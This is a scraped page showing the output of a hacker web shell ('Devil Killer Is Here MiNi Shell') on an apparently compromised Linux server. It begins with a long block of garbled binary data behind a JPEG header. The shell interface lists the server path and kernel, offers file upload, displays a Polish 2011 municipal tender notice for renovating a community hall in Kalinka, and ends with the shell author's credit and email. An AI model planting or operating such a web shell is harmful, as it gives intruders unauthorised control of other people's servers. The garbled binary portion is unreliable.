JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110304/73225-N-2011.html

<p class="kh_header"><b>Jabłoń: Zagospodarowanie terenu oraz docieplenie i wyposażenie budynku świetlicy w Kalince</b><br>
<b>Numer ogłoszenia: 73225 - 2011; data zamieszczenia: 04.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Jabłoń , ul. Zamojskiego 27, 21-205 Jabłoń, woj. lubelskie, tel. 083 3560036.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.jablon.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zagospodarowanie terenu oraz docieplenie i wyposażenie budynku świetlicy w Kalince.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.2. Zakres zamówienia obejmuje:
3.2.1. Wykonanie elewacji zewnętrznej budynku świetlicy na pow. ok. 222 m2
- ocieplenie warstwą styropianu PS-E FS 15 gr. 12 cm 
- wykończenie tynkiem cienkowarstwowym na siatce z włókna szklanego
3.2.2. Wykonanie podjazdu dla osób niepełnosprawnych
3.2.3. Wykonanie chodnika z kostki brukowej betonowej szarej gr. 6 cm, na podsypce cementowo-piaskowej na pow. ok. 81 m2 wraz z uporządkowaniem terenu i przygotowaniem go do stanu umożliwiającego wprowadzenie nasadzeń oraz obsianie trawą - pow. ok. 3000 m2. 
W związku ze znacznym zdewastowaniem przedmiotowego terenu, Wykonawca zobowiązany jest przed przystąpieniem do kalkulacji kosztów przeprowadzić wizję lokalną terenu. 
3.2.4. Ogrodzenie terenu siatką metalową wys. 1,5 m na słupkach stalowych o rozstawie 2,4 m obsadzonych w cokole - dł. 230 m. Przed przystąpieniem do robót, należy przeprowadzić geodezyjne wytyczenie granic działki. 
3.2.5. Wyposażenie budynku - dostawa
- zestaw komputerowy wraz z monitorem - szt. 4 
Płyta główna z 1 złącze PCI Express x16 niski profil,   
4 złącza DIMM, obsługa do 8GB DDR 3 pamięci RAM, 
min. 2 złącza SATA, 
1 złącze eSATA, 
Procesor dwurdzeniowy, 
Pamięć RAM- 3GB DDR3 1066MHz Dual Chanel, 
Dysk Twardy- 160 GB SATARII 7200 RPM, 
8 MB pamięci Cache, 
Karta Graficzna- PCI Express, 1024M (pamięci własnej), 
Karta dźwiękowa 6.1, 
Karta sieciowa 10/100 Mb/s, 
Klawiatura przewodowa (niski skok), 
Mysz optyczna 1600 dpi, 
Nagrywarka - DVD/RW wraz z oprogramowaniem do nagrywania płyt, 
System Operacyjny Microsoft Windows XP professional, 
oprogramowanie Microsoft Office Word, Exel, Power Point, 
program antywirusowy, 
monitor panoramiczny LCD 19 cali 2ms reakcji
- telewizor LCD wraz z ruchomym uchwytem ściennym - szt. 1
LCD, full HD, Rozmiar ekranu [cal]: 42, Format obrazu: 16:9, HDMI, USB, mpg4, ruchomy uchwyt ścienny, pilot + baterie, kolor obudowy srebrny
- urządzenie wielofunkcyjne - szt. 1
Drukarka Laser - color, Xero, skaner o rozdzielczości 1200x2400 dpi, czytnik kart pamięci, lightscribe, 
- biurko komputerowe I - szt. 3
Blat i 3 panele boczne wykonane z płyty wiórowej laminowanej o grubości 18 mm, wąskie krawędzie oklejane okleiną PCV, nogi metalowe, wysuwka na metalowej prowadnicy rolkowej, podstawka pod jednostkę komputerową. Kolor olcha
Wymiary :
              - szerokość 150 cm
              - głębokość 70 cm
              - wysokość 80 cm
- biurko komputerowe II - szt. 1 
Biurko z dostawką pod drukarkę wykonane z płyty wiórowej laminowanej o grubości 18 mm,  wąskie krawędzie oklejane okleiną PCV, wysuwka na metalowej prowadnicy rolkowej, 3 szuflady, 1 szafka zamykana na zamek,  Kolor olcha
Wymiary :
        - szerokość 150 cm
          - głębokość 70 cm
          - wysokość 80 cm
- krzesła obrotowe - szt. 10
Krzesła biurowe obrotowe z regulacją wysokości, 
podłokietnikami, 
niezależną regulacją kąta odchylenia siedziska,
niezależną regulacją kąta odchylenia oparcia,
regulacją wysokości podłokietników,
nakładki podłokietników wykonane z miękkiego poliuretanu,
wyprofilowanie lędźwiowe oparcia,
wyprofilowane siedzisko,
maksymalne obciążenie krzesła: 120 kg,
stabilna podstawa,
płynna regulacja wysokości siedziska.
Wymiary
oparcie: wysokość - 54 cm, szerokość - 43 cm, 
siedzisko: wysokość - 50-60 cm
głębokość - 49 cm, 
szerokość z podłokietnikami - 63 cm, 
wysokość fotela - 98-108 cm
- szafa  - szt. 1
Szafa  czterodrzwiowa  z czego dwoje drzwi zamykane zamkiem,  wykonana z płyty wiórowej laminowanej o grubości 18 mm, z trzema szufladami, 8 półkami, i częścią z wieszakiem na ubrania. Kolor olcha
Wymiary
 
Wysokość: 190-200cm
szerokość: 180-200 cm
Głębokość: 55- 60 cm.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.91-4, 45.44.30.00-4, 45.34.20.00-6, 45.23.32.22-1, 30.20.00.00-1, 30.21.30.00-5, 30.23.13.00-0, 30.23.60.00-2, 30.23.72.00-1, 30.23.71.30-9, 30.23.74.10-6, 30.23.74.60-1, 48.00.00.00-8, 48.62.40.00-8, 48.76.10.00-0, 32.32.46.00-6, 39.10.00.00-3, 39.11.11.00-4, 39.13.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby zamówienia nie wymaga posiadania specjalistycznych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia Zamawiający uzna za spełniony, jeżeli Wykonawca wykaże, że w ostatnich pięciu latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej 2 roboty budowlane w zakresie budowy lub remontu obiektów kubaturowych, o wartości co najmniej 50 000, 00 zł każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania potencjału technicznego, Zamawiający uzna za spełniony jeżeli Wykonawca złoży Oświadczenie z art. 22 ust. 1 PZP</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania osobami zdolnymi do wykonywania zamówienia Zamawiający uzna za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej 1 osobą, przewidzianą do pełnienia funkcji kierownika budowy, posiadającą co najmniej 3-letnie doświadczenie jako kierownik budowy oraz uprawnienia bez ograniczeń lub równoważne do wykonywania samodzielnych funkcji w budownictwie w specjalności architektonicznej lub konstrukcyjnej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek sytuacji ekonomicznej i finansowej Zamawiający uzna za spełniony, jeżeli Wykonawca wykaże, że posiada aktualną, opłaconą polisę ubezpieczeniową ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 50.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz oferty przetargowej (załącznik nr 1 do SIWZ).
2. Kosztorys ofertowy.
3. Formularz cenowy wg załączonego wzoru (załącznik nr 10 do SIWZ)
4. Oświadczenie, że wykonawca spełnia warunki udziału w postępowaniu na podstawie art. 22 ust. 1 PZP (załącznik nr 2 do SIWZ)
5. Oświadczenie, o braku podstawy do wykluczenia wykonawcy z postępowania na podstawie art. 24 ust. 1 i 2 ustawy (załącznik nr 3 do SIWZ)
6. Pełnomocnictwo do podpisywania dokumentów oferty i podpisania umowy, o ile nie wynika ono z innych złożonych dokumentów.
7. Umowę regulującą współpracę podmiotów występujących wspólnie - dotyczy spółki cywilnej. 
8. Specyfikację techniczną sprzętu komputerowego, urządzenia wielofunkcyjnego, telewizora LCD oraz sprzętu biurowego - (wg załącznika nr 9 do SIWZ). 
9. Oświadczenie wykonawcy o powierzeniu robót podwykonawcom (zał. nr 6 do SIWZ)
10. Wzory podpisów osoby (lub osób) uprawnionej do składania oświadczeń woli lub innych dokumentów (załącznik nr 7 do SIWZ):
a)	podpis skrócony tzw. Parafa ze wskazaniem osoby, której jest własnością,
b)	podpis czytelny : imię i nazwisko lub tylko nazwisko.
11. Jeżeli wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 12.W przypadku Konsorcjum należy dołączyć list intencyjny wspólników składających oferty wspólnie oraz ustanowienie przez te firmy wspólnego pełnomocnika (w oryginale).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość dokonania zmiany w umowie w stosunku do treści oferty w zakresie terminu realizacji zadania :
a)	jeżeli wystąpi nieterminowe przekazanie terenu budowy przez Zamawiającego, a opóźnienie to będzie miało wpływ na terminowe wykonanie przedmiotu umowy,
b)	jeżeli wystąpiła konieczność wykonania zamówień dodatkowych w okolicznościach wymienionych w § 67 ust. 5,
c)	na skutek siły wyższej zajdzie konieczność zmiany terminu wykonania zamówienia,
d)	na skutek wykopalisk uniemożliwiających wykonanie robót,
e)	na skutek jakiegokolwiek opóźnienia, utrudnienia lub przeszkód spowodowanych przez lub dających się przypisać Zamawiającemu lub innemu Wykonawcy zatrudnionemu przez Zamawiającego na terenie budowy,
f)	Wykonawcy przysługuje prawo do zmiany terminu wykonania przedmiotu umowy o czas opóźnienia Zamawiającego, jeżeli takie opóźnienie będzie miało wpływ na wykonanie przedmiotu umowy, w wykonaniu następujących zobowiązań:
1)	przekazania dokumentów budowy, do których Zamawiający był zobowiązany,
2. Zamawiający przewiduje możliwość dokonania zmiany w umowie w stosunku do treści oferty w zakresie ceny:
a) jeżeli w trakcie trwania umowy zmianie ulegnie urzędowa stawka VAT na roboty budowlane, 
3.W celu dokonania przewidzianych w umowie zmian należy podać: sposób ich inicjowania, sposób wprowadzania i możliwe skutki. Inicjowanie może nastąpić przez Zamawiającego albo Wykonawcę poprzez złożenie wniosku pisemnego. Wniosek taki powinien zawierać:
1)	opis zmiany,
2)	uzasadnienie zmiany,
3)	koszt zmiany oraz jego wpływ na wysokość wynagrodzenia,
4)	czas wykonania zmiany oraz wpływ zmiany na termin zakończenia umowy.
Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powstałych okoliczności w formie opisowej i właściwie umotywowanej (protokół wraz z uzasadnieniem ) przez powołaną przez Zamawiającego komisję techniczną, w składzie której będą m.in. Inspektor Nadzoru oraz Kierownik Budowy.
4. Wszelkie zmiany wymagają formy pisemnej w postaci aneksu.
5. Umowa zostanie zawarta na warunkach i według wzoru stanowiącego załącznik  nr 3 do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jablon.bip.mbnet.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Jabłoń
ul. A. Zamoyskiego 27
21-205 Jabłoń
pok. nr 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.03.2011 godzina 10:00, miejsce: Urząd Gminy Jabłoń
ul. A. Zamoyskiego 27
21-205 Jabłoń
pok. nr 4 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Programu Rozwoju Obszarów Wiejskich na lat a2007-2013, Działanie 413 Wdarażanie Lokalnych Strategii Rozwoju dla operacji, które odpowiadają warunkom przyznania pomocy w ramach działania /Odnowa i Rozwój Wsi/.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com